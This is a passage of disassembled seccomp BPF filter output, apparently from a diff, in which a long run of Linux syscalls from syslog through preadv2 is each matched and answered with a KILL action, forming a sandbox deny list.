0x00 0x00000000 return KILL + 0198: 0x15 0x00 0x01 0x00000067 if (A != syslog) goto 0200 + 0199: 0x06 0x00 0x00 0x00000000 return KILL + 0200: 0x15 0x00 0x01 0x00000068 if (A != getgid) goto 0202 + 0201: 0x06 0x00 0x00 0x00000000 return KILL + 0202: 0x15 0x00 0x01 0x00000069 if (A != setuid) goto 0204 + 0203: 0x06 0x00 0x00 0x00000000 return KILL + 0204: 0x15 0x00 0x01 0x0000006a if (A != setgid) goto 0206 + 0205: 0x06 0x00 0x00 0x00000000 return KILL + 0206: 0x15 0x00 0x01 0x0000006b if (A != geteuid) goto 0208 + 0207: 0x06 0x00 0x00 0x00000000 return KILL + 0208: 0x15 0x00 0x01 0x0000006c if (A != getegid) goto 0210 + 0209: 0x06 0x00 0x00 0x00000000 return KILL + 0210: 0x15 0x00 0x01 0x0000006d if (A != setpgid) goto 0212 + 0211: 0x06 0x00 0x00 0x00000000 return KILL + 0212: 0x15 0x00 0x01 0x0000006e if (A != getppid) goto 0214 + 0213: 0x06 0x00 0x00 0x00000000 return KILL + 0214: 0x15 0x00 0x01 0x0000006f if (A != getpgrp) goto 0216 + 0215: 0x06 0x00 0x00 0x00000000 return KILL + 0216: 0x15 0x00 0x01 0x00000070 if (A != setsid) goto 0218 + 0217: 0x06 0x00 0x00 0x00000000 return KILL + 0218: 0x15 0x00 0x01 0x00000071 if (A != setreuid) goto 0220 + 0219: 0x06 0x00 0x00 0x00000000 return KILL + 0220: 0x15 0x00 0x01 0x00000072 if (A != setregid) goto 0222 + 0221: 0x06 0x00 0x00 0x00000000 return KILL + 0222: 0x15 0x00 0x01 0x00000073 if (A != getgroups) goto 0224 + 0223: 0x06 0x00 0x00 0x00000000 return KILL + 0224: 0x15 0x00 0x01 0x00000074 if (A != setgroups) goto 0226 + 0225: 0x06 0x00 0x00 0x00000000 return KILL + 0226: 0x15 0x00 0x01 0x00000075 if (A != setresuid) goto 0228 + 0227: 0x06 0x00 0x00 0x00000000 return KILL + 0228: 0x15 0x00 0x01 0x00000076 if (A != getresuid) goto 0230 + 0229: 0x06 0x00 0x00 0x00000000 return KILL + 0230: 0x15 0x00 0x01 0x00000077 if (A != setresgid) goto 0232 + 0231: 0x06 0x00 0x00 0x00000000 return KILL + 0232: 0x15 0x00 0x01 0x00000078 if (A != getresgid) goto 0234 + 0233: 0x06 0x00 0x00 0x00000000 return KILL + 0234: 0x15 0x00 0x01 0x00000079 if (A != getpgid) goto 0236 + 0235: 0x06 0x00 0x00 0x00000000 return KILL + 0236: 0x15 0x00 0x01 0x0000007a if (A != setfsuid) goto 0238 + 0237: 0x06 0x00 0x00 0x00000000 return KILL + 0238: 0x15 0x00 0x01 0x0000007b if (A != setfsgid) goto 0240 + 0239: 0x06 0x00 0x00 0x00000000 return KILL + 0240: 0x15 0x00 0x01 0x0000007c if (A != getsid) goto 0242 + 0241: 0x06 0x00 0x00 0x00000000 return KILL + 0242: 0x15 0x00 0x01 0x0000007d if (A != capget) goto 0244 + 0243: 0x06 0x00 0x00 0x00000000 return KILL + 0244: 0x15 0x00 0x01 0x0000007e if (A != capset) goto 0246 + 0245: 0x06 0x00 0x00 0x00000000 return KILL + 0246: 0x15 0x00 0x01 0x0000007f if (A != rt_sigpending) goto 0248 + 0247: 0x06 0x00 0x00 0x00000000 return KILL + 0248: 0x15 0x00 0x01 0x00000080 if (A != rt_sigtimedwait) goto 0250 + 0249: 0x06 0x00 0x00 0x00000000 return KILL + 0250: 0x15 0x00 0x01 0x00000081 if (A != rt_sigqueueinfo) goto 0252 + 0251: 0x06 0x00 0x00 0x00000000 return KILL + 0252: 0x15 0x00 0x01 0x00000082 if (A != rt_sigsuspend) goto 0254 + 0253: 0x06 0x00 0x00 0x00000000 return KILL + 0254: 0x15 0x00 0x01 0x00000083 if (A != sigaltstack) goto 0256 + 0255: 0x06 0x00 0x00 0x00000000 return KILL + 0256: 0x15 0x00 0x01 0x00000084 if (A != utime) goto 0258 + 0257: 0x06 0x00 0x00 0x00000000 return KILL + 0258: 0x15 0x00 0x01 0x00000085 if (A != mknod) goto 0260 + 0259: 0x06 0x00 0x00 0x00000000 return KILL + 0260: 0x15 0x00 0x01 0x00000086 if (A != uselib) goto 0262 + 0261: 0x06 0x00 0x00 0x00000000 return KILL + 0262: 0x15 0x00 0x01 0x00000087 if (A != personality) goto 0264 + 0263: 0x06 0x00 0x00 0x00000000 return KILL + 0264: 0x15 0x00 0x01 0x00000088 if (A != ustat) goto 0266 + 0265: 0x06 0x00 0x00 0x00000000 return KILL + 0266: 0x15 0x00 0x01 0x00000089 if (A != statfs) goto 0268 + 0267: 0x06 0x00 0x00 0x00000000 return KILL + 0268: 0x15 0x00 0x01 0x0000008a if (A != fstatfs) goto 0270 + 0269: 0x06 0x00 0x00 0x00000000 return KILL + 0270: 0x15 0x00 0x01 0x0000008b if (A != sysfs) goto 0272 + 0271: 0x06 0x00 0x00 0x00000000 return KILL + 0272: 0x15 0x00 0x01 0x0000008c if (A != getpriority) goto 0274 + 0273: 0x06 0x00 0x00 0x00000000 return KILL + 0274: 0x15 0x00 0x01 0x0000008d if (A != setpriority) goto 0276 + 0275: 0x06 0x00 0x00 0x00000000 return KILL + 0276: 0x15 0x00 0x01 0x0000008e if (A != sched_setparam) goto 0278 + 0277: 0x06 0x00 0x00 0x00000000 return KILL + 0278: 0x15 0x00 0x01 0x0000008f if (A != sched_getparam) goto 0280 + 0279: 0x06 0x00 0x00 0x00000000 return KILL + 0280: 0x15 0x00 0x01 0x00000090 if (A != sched_setscheduler) goto 0282 + 0281: 0x06 0x00 0x00 0x00000000 return KILL + 0282: 0x15 0x00 0x01 0x00000091 if (A != sched_getscheduler) goto 0284 + 0283: 0x06 0x00 0x00 0x00000000 return KILL + 0284: 0x15 0x00 0x01 0x00000092 if (A != sched_get_priority_max) goto 0286 + 0285: 0x06 0x00 0x00 0x00000000 return KILL + 0286: 0x15 0x00 0x01 0x00000093 if (A != sched_get_priority_min) goto 0288 + 0287: 0x06 0x00 0x00 0x00000000 return KILL + 0288: 0x15 0x00 0x01 0x00000094 if (A != sched_rr_get_interval) goto 0290 + 0289: 0x06 0x00 0x00 0x00000000 return KILL + 0290: 0x15 0x00 0x01 0x00000095 if (A != mlock) goto 0292 + 0291: 0x06 0x00 0x00 0x00000000 return KILL + 0292: 0x15 0x00 0x01 0x00000096 if (A != munlock) goto 0294 + 0293: 0x06 0x00 0x00 0x00000000 return KILL + 0294: 0x15 0x00 0x01 0x00000097 if (A != mlockall) goto 0296 + 0295: 0x06 0x00 0x00 0x00000000 return KILL + 0296: 0x15 0x00 0x01 0x00000098 if (A != munlockall) goto 0298 + 0297: 0x06 0x00 0x00 0x00000000 return KILL + 0298: 0x15 0x00 0x01 0x00000099 if (A != vhangup) goto 0300 + 0299: 0x06 0x00 0x00 0x00000000 return KILL + 0300: 0x15 0x00 0x01 0x0000009a if (A != modify_ldt) goto 0302 + 0301: 0x06 0x00 0x00 0x00000000 return KILL + 0302: 0x15 0x00 0x01 0x0000009b if (A != pivot_root) goto 0304 + 0303: 0x06 0x00 0x00 0x00000000 return KILL + 0304: 0x15 0x00 0x01 0x0000009c if (A != _sysctl) goto 0306 + 0305: 0x06 0x00 0x00 0x00000000 return KILL + 0306: 0x15 0x00 0x01 0x0000009d if (A != prctl) goto 0308 + 0307: 0x06 0x00 0x00 0x00000000 return KILL + 0308: 0x15 0x00 0x01 0x0000009e if (A != arch_prctl) goto 0310 + 0309: 0x06 0x00 0x00 0x00000000 return KILL + 0310: 0x15 0x00 0x01 0x0000009f if (A != adjtimex) goto 0312 + 0311: 0x06 0x00 0x00 0x00000000 return KILL + 0312: 0x15 0x00 0x01 0x000000a0 if (A != setrlimit) goto 0314 + 0313: 0x06 0x00 0x00 0x00000000 return KILL + 0314: 0x15 0x00 0x01 0x000000a1 if (A != chroot) goto 0316 + 0315: 0x06 0x00 0x00 0x00000000 return KILL + 0316: 0x15 0x00 0x01 0x000000a2 if (A != sync) goto 0318 + 0317: 0x06 0x00 0x00 0x00000000 return KILL + 0318: 0x15 0x00 0x01 0x000000a3 if (A != acct) goto 0320 + 0319: 0x06 0x00 0x00 0x00000000 return KILL + 0320: 0x15 0x00 0x01 0x000000a4 if (A != settimeofday) goto 0322 + 0321: 0x06 0x00 0x00 0x00000000 return KILL + 0322: 0x15 0x00 0x01 0x000000a5 if (A != mount) goto 0324 + 0323: 0x06 0x00 0x00 0x00000000 return KILL + 0324: 0x15 0x00 0x01 0x000000a6 if (A != umount2) goto 0326 + 0325: 0x06 0x00 0x00 0x00000000 return KILL + 0326: 0x15 0x00 0x01 0x000000a7 if (A != swapon) goto 0328 + 0327: 0x06 0x00 0x00 0x00000000 return KILL + 0328: 0x15 0x00 0x01 0x000000a8 if (A != swapoff) goto 0330 + 0329: 0x06 0x00 0x00 0x00000000 return KILL + 0330: 0x15 0x00 0x01 0x000000aa if (A != sethostname) goto 0332 + 0331: 0x06 0x00 0x00 0x00000000 return KILL + 0332: 0x15 0x00 0x01 0x000000ab if (A != setdomainname) goto 0334 + 0333: 0x06 0x00 0x00 0x00000000 return KILL + 0334: 0x15 0x00 0x01 0x000000ac if (A != iopl) goto 0336 + 0335: 0x06 0x00 0x00 0x00000000 return KILL + 0336: 0x15 0x00 0x01 0x000000ad if (A != ioperm) goto 0338 + 0337: 0x06 0x00 0x00 0x00000000 return KILL + 0338: 0x15 0x00 0x01 0x000000ae if (A != create_module) goto 0340 + 0339: 0x06 0x00 0x00 0x00000000 return KILL + 0340: 0x15 0x00 0x01 0x000000af if (A != init_module) goto 0342 + 0341: 0x06 0x00 0x00 0x00000000 return KILL + 0342: 0x15 0x00 0x01 0x000000b0 if (A != delete_module) goto 0344 + 0343: 0x06 0x00 0x00 0x00000000 return KILL + 0344: 0x15 0x00 0x01 0x000000b1 if (A != get_kernel_syms) goto 0346 + 0345: 0x06 0x00 0x00 0x00000000 return KILL + 0346: 0x15 0x00 0x01 0x000000b2 if (A != query_module) goto 0348 + 0347: 0x06 0x00 0x00 0x00000000 return KILL + 0348: 0x15 0x00 0x01 0x000000b3 if (A != quotactl) goto 0350 + 0349: 0x06 0x00 0x00 0x00000000 return KILL + 0350: 0x15 0x00 0x01 0x000000b4 if (A != nfsservctl) goto 0352 + 0351: 0x06 0x00 0x00 0x00000000 return KILL + 0352: 0x15 0x00 0x01 0x000000b5 if (A != getpmsg) goto 0354 + 0353: 0x06 0x00 0x00 0x00000000 return KILL + 0354: 0x15 0x00 0x01 0x000000b6 if (A != putpmsg) goto 0356 + 0355: 0x06 0x00 0x00 0x00000000 return KILL + 0356: 0x15 0x00 0x01 0x000000b7 if (A != afs_syscall) goto 0358 + 0357: 0x06 0x00 0x00 0x00000000 return KILL + 0358: 0x15 0x00 0x01 0x000000b8 if (A != tuxcall) goto 0360 + 0359: 0x06 0x00 0x00 0x00000000 return KILL + 0360: 0x15 0x00 0x01 0x000000b9 if (A != security) goto 0362 + 0361: 0x06 0x00 0x00 0x00000000 return KILL + 0362: 0x15 0x00 0x01 0x000000ba if (A != gettid) goto 0364 + 0363: 0x06 0x00 0x00 0x00000000 return KILL + 0364: 0x15 0x00 0x01 0x000000bb if (A != readahead) goto 0366 + 0365: 0x06 0x00 0x00 0x00000000 return KILL + 0366: 0x15 0x00 0x01 0x000000bc if (A != setxattr) goto 0368 + 0367: 0x06 0x00 0x00 0x00000000 return KILL + 0368: 0x15 0x00 0x01 0x000000bd if (A != lsetxattr) goto 0370 + 0369: 0x06 0x00 0x00 0x00000000 return KILL + 0370: 0x15 0x00 0x01 0x000000be if (A != fsetxattr) goto 0372 + 0371: 0x06 0x00 0x00 0x00000000 return KILL + 0372: 0x15 0x00 0x01 0x000000bf if (A != getxattr) goto 0374 + 0373: 0x06 0x00 0x00 0x00000000 return KILL + 0374: 0x15 0x00 0x01 0x000000c0 if (A != lgetxattr) goto 0376 + 0375: 0x06 0x00 0x00 0x00000000 return KILL + 0376: 0x15 0x00 0x01 0x000000c1 if (A != fgetxattr) goto 0378 + 0377: 0x06 0x00 0x00 0x00000000 return KILL + 0378: 0x15 0x00 0x01 0x000000c2 if (A != listxattr) goto 0380 + 0379: 0x06 0x00 0x00 0x00000000 return KILL + 0380: 0x15 0x00 0x01 0x000000c3 if (A != llistxattr) goto 0382 + 0381: 0x06 0x00 0x00 0x00000000 return KILL + 0382: 0x15 0x00 0x01 0x000000c4 if (A != flistxattr) goto 0384 + 0383: 0x06 0x00 0x00 0x00000000 return KILL + 0384: 0x15 0x00 0x01 0x000000c5 if (A != removexattr) goto 0386 + 0385: 0x06 0x00 0x00 0x00000000 return KILL + 0386: 0x15 0x00 0x01 0x000000c6 if (A != lremovexattr) goto 0388 + 0387: 0x06 0x00 0x00 0x00000000 return KILL + 0388: 0x15 0x00 0x01 0x000000c7 if (A != fremovexattr) goto 0390 + 0389: 0x06 0x00 0x00 0x00000000 return KILL + 0390: 0x15 0x00 0x01 0x000000c8 if (A != tkill) goto 0392 + 0391: 0x06 0x00 0x00 0x00000000 return KILL + 0392: 0x15 0x00 0x01 0x000000c9 if (A != time) goto 0394 + 0393: 0x06 0x00 0x00 0x00000000 return KILL + 0394: 0x15 0x00 0x01 0x000000ca if (A != futex) goto 0396 + 0395: 0x06 0x00 0x00 0x00000000 return KILL + 0396: 0x15 0x00 0x01 0x000000cb if (A != sched_setaffinity) goto 0398 + 0397: 0x06 0x00 0x00 0x00000000 return KILL + 0398: 0x15 0x00 0x01 0x000000cc if (A != sched_getaffinity) goto 0400 + 0399: 0x06 0x00 0x00 0x00000000 return KILL + 0400: 0x15 0x00 0x01 0x000000cd if (A != set_thread_area) goto 0402 + 0401: 0x06 0x00 0x00 0x00000000 return KILL + 0402: 0x15 0x00 0x01 0x000000ce if (A != io_setup) goto 0404 + 0403: 0x06 0x00 0x00 0x00000000 return KILL + 0404: 0x15 0x00 0x01 0x000000cf if (A != io_destroy) goto 0406 + 0405: 0x06 0x00 0x00 0x00000000 return KILL + 0406: 0x15 0x00 0x01 0x000000d0 if (A != io_getevents) goto 0408 + 0407: 0x06 0x00 0x00 0x00000000 return KILL + 0408: 0x15 0x00 0x01 0x000000d1 if (A != io_submit) goto 0410 + 0409: 0x06 0x00 0x00 0x00000000 return KILL + 0410: 0x15 0x00 0x01 0x000000d2 if (A != io_cancel) goto 0412 + 0411: 0x06 0x00 0x00 0x00000000 return KILL + 0412: 0x15 0x00 0x01 0x000000d3 if (A != get_thread_area) goto 0414 + 0413: 0x06 0x00 0x00 0x00000000 return KILL + 0414: 0x15 0x00 0x01 0x000000d4 if (A != lookup_dcookie) goto 0416 + 0415: 0x06 0x00 0x00 0x00000000 return KILL + 0416: 0x15 0x00 0x01 0x000000d5 if (A != epoll_create) goto 0418 + 0417: 0x06 0x00 0x00 0x00000000 return KILL + 0418: 0x15 0x00 0x01 0x000000d6 if (A != epoll_ctl_old) goto 0420 + 0419: 0x06 0x00 0x00 0x00000000 return KILL + 0420: 0x15 0x00 0x01 0x000000d7 if (A != epoll_wait_old) goto 0422 + 0421: 0x06 0x00 0x00 0x00000000 return KILL + 0422: 0x15 0x00 0x01 0x000000d8 if (A != remap_file_pages) goto 0424 + 0423: 0x06 0x00 0x00 0x00000000 return KILL + 0424: 0x15 0x00 0x01 0x000000d9 if (A != getdents64) goto 0426 + 0425: 0x06 0x00 0x00 0x00000000 return KILL + 0426: 0x15 0x00 0x01 0x000000da if (A != set_tid_address) goto 0428 + 0427: 0x06 0x00 0x00 0x00000000 return KILL + 0428: 0x15 0x00 0x01 0x000000db if (A != restart_syscall) goto 0430 + 0429: 0x06 0x00 0x00 0x00000000 return KILL + 0430: 0x15 0x00 0x01 0x000000dc if (A != semtimedop) goto 0432 + 0431: 0x06 0x00 0x00 0x00000000 return KILL + 0432: 0x15 0x00 0x01 0x000000dd if (A != fadvise64) goto 0434 + 0433: 0x06 0x00 0x00 0x00000000 return KILL + 0434: 0x15 0x00 0x01 0x000000de if (A != timer_create) goto 0436 + 0435: 0x06 0x00 0x00 0x00000000 return KILL + 0436: 0x15 0x00 0x01 0x000000df if (A != timer_settime) goto 0438 + 0437: 0x06 0x00 0x00 0x00000000 return KILL + 0438: 0x15 0x00 0x01 0x000000e0 if (A != timer_gettime) goto 0440 + 0439: 0x06 0x00 0x00 0x00000000 return KILL + 0440: 0x15 0x00 0x01 0x000000e1 if (A != timer_getoverrun) goto 0442 + 0441: 0x06 0x00 0x00 0x00000000 return KILL + 0442: 0x15 0x00 0x01 0x000000e2 if (A != timer_delete) goto 0444 + 0443: 0x06 0x00 0x00 0x00000000 return KILL + 0444: 0x15 0x00 0x01 0x000000e3 if (A != clock_settime) goto 0446 + 0445: 0x06 0x00 0x00 0x00000000 return KILL + 0446: 0x15 0x00 0x01 0x000000e4 if (A != clock_gettime) goto 0448 + 0447: 0x06 0x00 0x00 0x00000000 return KILL + 0448: 0x15 0x00 0x01 0x000000e5 if (A != clock_getres) goto 0450 + 0449: 0x06 0x00 0x00 0x00000000 return KILL + 0450: 0x15 0x00 0x01 0x000000e6 if (A != clock_nanosleep) goto 0452 + 0451: 0x06 0x00 0x00 0x00000000 return KILL + 0452: 0x15 0x00 0x01 0x000000e8 if (A != epoll_wait) goto 0454 + 0453: 0x06 0x00 0x00 0x00000000 return KILL + 0454: 0x15 0x00 0x01 0x000000e9 if (A != epoll_ctl) goto 0456 + 0455: 0x06 0x00 0x00 0x00000000 return KILL + 0456: 0x15 0x00 0x01 0x000000ea if (A != tgkill) goto 0458 + 0457: 0x06 0x00 0x00 0x00000000 return KILL + 0458: 0x15 0x00 0x01 0x000000eb if (A != utimes) goto 0460 + 0459: 0x06 0x00 0x00 0x00000000 return KILL + 0460: 0x15 0x00 0x01 0x000000ec if (A != vserver) goto 0462 + 0461: 0x06 0x00 0x00 0x00000000 return KILL + 0462: 0x15 0x00 0x01 0x000000ed if (A != mbind) goto 0464 + 0463: 0x06 0x00 0x00 0x00000000 return KILL + 0464: 0x15 0x00 0x01 0x000000ee if (A != set_mempolicy) goto 0466 + 0465: 0x06 0x00 0x00 0x00000000 return KILL + 0466: 0x15 0x00 0x01 0x000000ef if (A != get_mempolicy) goto 0468 + 0467: 0x06 0x00 0x00 0x00000000 return KILL + 0468: 0x15 0x00 0x01 0x000000f0 if (A != mq_open) goto 0470 + 0469: 0x06 0x00 0x00 0x00000000 return KILL + 0470: 0x15 0x00 0x01 0x000000f1 if (A != mq_unlink) goto 0472 + 0471: 0x06 0x00 0x00 0x00000000 return KILL + 0472: 0x15 0x00 0x01 0x000000f2 if (A != mq_timedsend) goto 0474 + 0473: 0x06 0x00 0x00 0x00000000 return KILL + 0474: 0x15 0x00 0x01 0x000000f3 if (A != mq_timedreceive) goto 0476 + 0475: 0x06 0x00 0x00 0x00000000 return KILL + 0476: 0x15 0x00 0x01 0x000000f4 if (A != mq_notify) goto 0478 + 0477: 0x06 0x00 0x00 0x00000000 return KILL + 0478: 0x15 0x00 0x01 0x000000f5 if (A != mq_getsetattr) goto 0480 + 0479: 0x06 0x00 0x00 0x00000000 return KILL + 0480: 0x15 0x00 0x01 0x000000f6 if (A != kexec_load) goto 0482 + 0481: 0x06 0x00 0x00 0x00000000 return KILL + 0482: 0x15 0x00 0x01 0x000000f7 if (A != waitid) goto 0484 + 0483: 0x06 0x00 0x00 0x00000000 return KILL + 0484: 0x15 0x00 0x01 0x000000f8 if (A != add_key) goto 0486 + 0485: 0x06 0x00 0x00 0x00000000 return KILL + 0486: 0x15 0x00 0x01 0x000000f9 if (A != request_key) goto 0488 + 0487: 0x06 0x00 0x00 0x00000000 return KILL + 0488: 0x15 0x00 0x01 0x000000fa if (A != keyctl) goto 0490 + 0489: 0x06 0x00 0x00 0x00000000 return KILL + 0490: 0x15 0x00 0x01 0x000000fb if (A != ioprio_set) goto 0492 + 0491: 0x06 0x00 0x00 0x00000000 return KILL + 0492: 0x15 0x00 0x01 0x000000fc if (A != ioprio_get) goto 0494 + 0493: 0x06 0x00 0x00 0x00000000 return KILL + 0494: 0x15 0x00 0x01 0x000000fd if (A != inotify_init) goto 0496 + 0495: 0x06 0x00 0x00 0x00000000 return KILL + 0496: 0x15 0x00 0x01 0x000000fe if (A != inotify_add_watch) goto 0498 + 0497: 0x06 0x00 0x00 0x00000000 return KILL + 0498: 0x15 0x00 0x01 0x000000ff if (A != inotify_rm_watch) goto 0500 + 0499: 0x06 0x00 0x00 0x00000000 return KILL + 0500: 0x15 0x00 0x01 0x00000100 if (A != migrate_pages) goto 0502 + 0501: 0x06 0x00 0x00 0x00000000 return KILL + 0502: 0x15 0x00 0x01 0x00000101 if (A != openat) goto 0504 + 0503: 0x06 0x00 0x00 0x00000000 return KILL + 0504: 0x15 0x00 0x01 0x00000102 if (A != mkdirat) goto 0506 + 0505: 0x06 0x00 0x00 0x00000000 return KILL + 0506: 0x15 0x00 0x01 0x00000103 if (A != mknodat) goto 0508 + 0507: 0x06 0x00 0x00 0x00000000 return KILL + 0508: 0x15 0x00 0x01 0x00000104 if (A != fchownat) goto 0510 + 0509: 0x06 0x00 0x00 0x00000000 return KILL + 0510: 0x15 0x00 0x01 0x00000105 if (A != futimesat) goto 0512 + 0511: 0x06 0x00 0x00 0x00000000 return KILL + 0512: 0x15 0x00 0x01 0x00000106 if (A != newfstatat) goto 0514 + 0513: 0x06 0x00 0x00 0x00000000 return KILL + 0514: 0x15 0x00 0x01 0x00000107 if (A != unlinkat) goto 0516 + 0515: 0x06 0x00 0x00 0x00000000 return KILL + 0516: 0x15 0x00 0x01 0x00000108 if (A != renameat) goto 0518 + 0517: 0x06 0x00 0x00 0x00000000 return KILL + 0518: 0x15 0x00 0x01 0x00000109 if (A != linkat) goto 0520 + 0519: 0x06 0x00 0x00 0x00000000 return KILL + 0520: 0x15 0x00 0x01 0x0000010a if (A != symlinkat) goto 0522 + 0521: 0x06 0x00 0x00 0x00000000 return KILL + 0522: 0x15 0x00 0x01 0x0000010b if (A != readlinkat) goto 0524 + 0523: 0x06 0x00 0x00 0x00000000 return KILL + 0524: 0x15 0x00 0x01 0x0000010c if (A != fchmodat) goto 0526 + 0525: 0x06 0x00 0x00 0x00000000 return KILL + 0526: 0x15 0x00 0x01 0x0000010d if (A != faccessat) goto 0528 + 0527: 0x06 0x00 0x00 0x00000000 return KILL + 0528: 0x15 0x00 0x01 0x0000010e if (A != pselect6) goto 0530 + 0529: 0x06 0x00 0x00 0x00000000 return KILL + 0530: 0x15 0x00 0x01 0x0000010f if (A != ppoll) goto 0532 + 0531: 0x06 0x00 0x00 0x00000000 return KILL + 0532: 0x15 0x00 0x01 0x00000110 if (A != unshare) goto 0534 + 0533: 0x06 0x00 0x00 0x00000000 return KILL + 0534: 0x15 0x00 0x01 0x00000111 if (A != set_robust_list) goto 0536 + 0535: 0x06 0x00 0x00 0x00000000 return KILL + 0536: 0x15 0x00 0x01 0x00000112 if (A != get_robust_list) goto 0538 + 0537: 0x06 0x00 0x00 0x00000000 return KILL + 0538: 0x15 0x00 0x01 0x00000113 if (A != splice) goto 0540 + 0539: 0x06 0x00 0x00 0x00000000 return KILL + 0540: 0x15 0x00 0x01 0x00000114 if (A != tee) goto 0542 + 0541: 0x06 0x00 0x00 0x00000000 return KILL + 0542: 0x15 0x00 0x01 0x00000115 if (A != sync_file_range) goto 0544 + 0543: 0x06 0x00 0x00 0x00000000 return KILL + 0544: 0x15 0x00 0x01 0x00000116 if (A != vmsplice) goto 0546 + 0545: 0x06 0x00 0x00 0x00000000 return KILL + 0546: 0x15 0x00 0x01 0x00000117 if (A != move_pages) goto 0548 + 0547: 0x06 0x00 0x00 0x00000000 return KILL + 0548: 0x15 0x00 0x01 0x00000118 if (A != utimensat) goto 0550 + 0549: 0x06 0x00 0x00 0x00000000 return KILL + 0550: 0x15 0x00 0x01 0x00000119 if (A != epoll_pwait) goto 0552 + 0551: 0x06 0x00 0x00 0x00000000 return KILL + 0552: 0x15 0x00 0x01 0x0000011a if (A != signalfd) goto 0554 + 0553: 0x06 0x00 0x00 0x00000000 return KILL + 0554: 0x15 0x00 0x01 0x0000011b if (A != timerfd) goto 0556 + 0555: 0x06 0x00 0x00 0x00000000 return KILL + 0556: 0x15 0x00 0x01 0x0000011c if (A != eventfd) goto 0558 + 0557: 0x06 0x00 0x00 0x00000000 return KILL + 0558: 0x15 0x00 0x01 0x0000011d if (A != fallocate) goto 0560 + 0559: 0x06 0x00 0x00 0x00000000 return KILL + 0560: 0x15 0x00 0x01 0x0000011e if (A != timerfd_settime) goto 0562 + 0561: 0x06 0x00 0x00 0x00000000 return KILL + 0562: 0x15 0x00 0x01 0x0000011f if (A != timerfd_gettime) goto 0564 + 0563: 0x06 0x00 0x00 0x00000000 return KILL + 0564: 0x15 0x00 0x01 0x00000120 if (A != accept4) goto 0566 + 0565: 0x06 0x00 0x00 0x00000000 return KILL + 0566: 0x15 0x00 0x01 0x00000121 if (A != signalfd4) goto 0568 + 0567: 0x06 0x00 0x00 0x00000000 return KILL + 0568: 0x15 0x00 0x01 0x00000122 if (A != eventfd2) goto 0570 + 0569: 0x06 0x00 0x00 0x00000000 return KILL + 0570: 0x15 0x00 0x01 0x00000123 if (A != epoll_create1) goto 0572 + 0571: 0x06 0x00 0x00 0x00000000 return KILL + 0572: 0x15 0x00 0x01 0x00000124 if (A != dup3) goto 0574 + 0573: 0x06 0x00 0x00 0x00000000 return KILL + 0574: 0x15 0x00 0x01 0x00000125 if (A != pipe2) goto 0576 + 0575: 0x06 0x00 0x00 0x00000000 return KILL + 0576: 0x15 0x00 0x01 0x00000126 if (A != inotify_init1) goto 0578 + 0577: 0x06 0x00 0x00 0x00000000 return KILL + 0578: 0x15 0x00 0x01 0x00000127 if (A != preadv) goto 0580 + 0579: 0x06 0x00 0x00 0x00000000 return KILL + 0580: 0x15 0x00 0x01 0x00000128 if (A != pwritev) goto 0582 + 0581: 0x06 0x00 0x00 0x00000000 return KILL + 0582: 0x15 0x00 0x01 0x00000129 if (A != rt_tgsigqueueinfo) goto 0584 + 0583: 0x06 0x00 0x00 0x00000000 return KILL + 0584: 0x15 0x00 0x01 0x0000012a if (A != perf_event_open) goto 0586 + 0585: 0x06 0x00 0x00 0x00000000 return KILL + 0586: 0x15 0x00 0x01 0x0000012b if (A != recvmmsg) goto 0588 + 0587: 0x06 0x00 0x00 0x00000000 return KILL + 0588: 0x15 0x00 0x01 0x0000012c if (A != fanotify_init) goto 0590 + 0589: 0x06 0x00 0x00 0x00000000 return KILL + 0590: 0x15 0x00 0x01 0x0000012d if (A != fanotify_mark) goto 0592 + 0591: 0x06 0x00 0x00 0x00000000 return KILL + 0592: 0x15 0x00 0x01 0x0000012e if (A != prlimit64) goto 0594 + 0593: 0x06 0x00 0x00 0x00000000 return KILL + 0594: 0x15 0x00 0x01 0x0000012f if (A != name_to_handle_at) goto 0596 + 0595: 0x06 0x00 0x00 0x00000000 return KILL + 0596: 0x15 0x00 0x01 0x00000130 if (A != open_by_handle_at) goto 0598 + 0597: 0x06 0x00 0x00 0x00000000 return KILL + 0598: 0x15 0x00 0x01 0x00000131 if (A != clock_adjtime) goto 0600 + 0599: 0x06 0x00 0x00 0x00000000 return KILL + 0600: 0x15 0x00 0x01 0x00000132 if (A != syncfs) goto 0602 + 0601: 0x06 0x00 0x00 0x00000000 return KILL + 0602: 0x15 0x00 0x01 0x00000133 if (A != sendmmsg) goto 0604 + 0603: 0x06 0x00 0x00 0x00000000 return KILL + 0604: 0x15 0x00 0x01 0x00000134 if (A != setns) goto 0606 + 0605: 0x06 0x00 0x00 0x00000000 return KILL + 0606: 0x15 0x00 0x01 0x00000135 if (A != getcpu) goto 0608 + 0607: 0x06 0x00 0x00 0x00000000 return KILL + 0608: 0x15 0x00 0x01 0x00000138 if (A != kcmp) goto 0610 + 0609: 0x06 0x00 0x00 0x00000000 return KILL + 0610: 0x15 0x00 0x01 0x00000139 if (A != finit_module) goto 0612 + 0611: 0x06 0x00 0x00 0x00000000 return KILL + 0612: 0x15 0x00 0x01 0x0000013a if (A != sched_setattr) goto 0614 + 0613: 0x06 0x00 0x00 0x00000000 return KILL + 0614: 0x15 0x00 0x01 0x0000013b if (A != sched_getattr) goto 0616 + 0615: 0x06 0x00 0x00 0x00000000 return KILL + 0616: 0x15 0x00 0x01 0x0000013c if (A != renameat2) goto 0618 + 0617: 0x06 0x00 0x00 0x00000000 return KILL + 0618: 0x15 0x00 0x01 0x0000013d if (A != seccomp) goto 0620 + 0619: 0x06 0x00 0x00 0x00000000 return KILL + 0620: 0x15 0x00 0x01 0x0000013e if (A != getrandom) goto 0622 + 0621: 0x06 0x00 0x00 0x00000000 return KILL + 0622: 0x15 0x00 0x01 0x0000013f if (A != memfd_create) goto 0624 + 0623: 0x06 0x00 0x00 0x00000000 return KILL + 0624: 0x15 0x00 0x01 0x00000140 if (A != kexec_file_load) goto 0626 + 0625: 0x06 0x00 0x00 0x00000000 return KILL + 0626: 0x15 0x00 0x01 0x00000141 if (A != bpf) goto 0628 + 0627: 0x06 0x00 0x00 0x00000000 return KILL + 0628: 0x15 0x00 0x01 0x00000143 if (A != userfaultfd) goto 0630 + 0629: 0x06 0x00 0x00 0x00000000 return KILL + 0630: 0x15 0x00 0x01 0x00000144 if (A != membarrier) goto 0632 + 0631: 0x06 0x00 0x00 0x00000000 return KILL + 0632: 0x15 0x00 0x01 0x00000145 if (A != mlock2) goto 0634 + 0633: 0x06 0x00 0x00 0x00000000 return KILL + 0634: 0x15 0x00 0x01 0x00000146 if (A != copy_file_range) goto 0636 + 0635: 0x06 0x00 0x00 0x00000000 return KILL + 0636: 0x15 0x00 0x01 0x00000147 if (A != preadv2) goto 0638 + 0637: 0x06 0x00 0x00 0x00000000 return KILL + 